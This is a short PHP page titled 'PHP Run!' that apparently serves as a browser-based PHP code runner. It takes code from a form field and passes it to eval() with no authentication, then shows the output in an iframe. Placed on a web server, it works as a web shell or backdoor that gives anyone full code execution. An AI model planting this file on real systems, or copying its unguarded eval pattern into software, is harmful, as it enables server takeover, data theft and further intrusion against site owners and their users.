<?php if ((isset($_GET["iF"])) && (isset($_POST["__fCommand"]))) { ob_start(); eval (( get_magic_quotes_gpc() == "1" ? stripslashes($_POST["__fCommand"]) : $_POST["__fCommand"])); if (isset($_POST["doText"])) { $aa=htmlspecialchars(ob_get_clean()); header("Content-type: text/html; charset=UTF-8"); echo '<?xml version="1.0" encoding="UTF-8"?>'; echo "<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\"> <html xmlns=\"http://www.w3.org/1999/xhtml\" xml:lang=\"pt-br\"> <head><title></title></head> <body> <pre>$aa</pre> </body> </html>"; } die(); } /*<p><a href="<?php echo $_SERVER['PHP_SELF']; ?>">Index</a></p>*/ header("Content-type: text/html; charset=UTF-8"); echo '<?xml version="1.0" encoding="UTF-8"?>'; ?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-br"> <head> <title>PHP Run!</title> <style type="text/css"> body ( background-color: green; font-family: Verdana; ) textarea { font-family: "Courier New"; } #TextAA { font-size: 9 pt; } </style> </head> <body> <form target="float1" action="<?php echo $_SERVER['PHP_SELF']; ?>?iF=1" method="post"> <textarea rows="10" cols="80" name="__fCommand" id="TextAA">echo "";</textarea><br /> <input type="submit" accesskey="s" /> <label for="doText">TextView:</label><input type="checkbox" id="doText" name="doText" /><br /> </form> <iframe name="float1" id="float1" width="95%" height="300px">Test</iframe> </body> </html>